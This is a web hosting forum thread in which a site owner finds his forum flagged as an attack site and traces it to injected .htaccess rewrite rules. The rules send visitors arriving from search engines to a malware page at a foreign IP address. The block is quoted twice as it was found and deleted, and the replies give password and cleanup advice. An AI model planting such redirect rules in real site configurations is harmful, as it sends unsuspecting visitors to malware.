Listed as an attack site

jamesp57

New Member
I just found out that google has listed my forum as an attack site. It appears someone from the IP address 89.28.13.202 has cloned the website address or something.

If you google http://4x4sonthe.net and then click on the link, it will alert you to a virus or malware site.

Anyone have this happen to their website? Is there an easy way to clear this up?
 

jamesp57

New Member
Google's webmaster help guide isn't the easiest to navigate but I did find this in the .htaccess file

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

It's the redirect to the malware site.

I'm not an expert at programming so any help here would be appreciated.
 

Dan

Moderator
Hello James,

So is that one of your IPs? Did you put that redirect in?

If not then obviously take it out and change your password ASAP as it would appear that your domain's been compromised. If there isn't anything in the .htaccess that you put in there then you can simply delete the file.
 

jamesp57

New Member
Hello James,

So is that one of your IPs? Did you put that redirect in?

If not then obviously take it out and change your password ASAP as it would appear that your domain's been compromised. If there isn't anything in the .htaccess that you put in there then you can simply delete the file.
That isn't one of my IP's . I deleted all of this:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

but left the rest of the file. I found out from the support guys that someone from a Russian IP address hacked into the site. I changed the password to something a lot more difficult. I'm also changing passwords on all the other sites I manage and placed a ban on 89.* and 94.*.
 

rezag

New Member
If it is known and not giving out details of course, I am curious to know what is meant by hacked? what was the entry point?
 

DesotoD

New Member
I am having extreme problems with this very same issue. It appears to be mostly Joomla sites that are being hacked but I have seen it on some other installations. I'd block the ips but they just seem to get a new one.
 

Dan

Moderator
Hello, Desoto

If they are getting into your machine the same way (FTP) then you need to change your passwords else they'll just keep coming back. In the OP's case his .htaccess was being changed and that will not make any difference as to the content on the site.

I am having extreme problems with this very same issue. It appears to be mostly Joomla sites that are being hacked but I have seen it on some other installations. I'd block the ips but they just seem to get a new one.
 
Top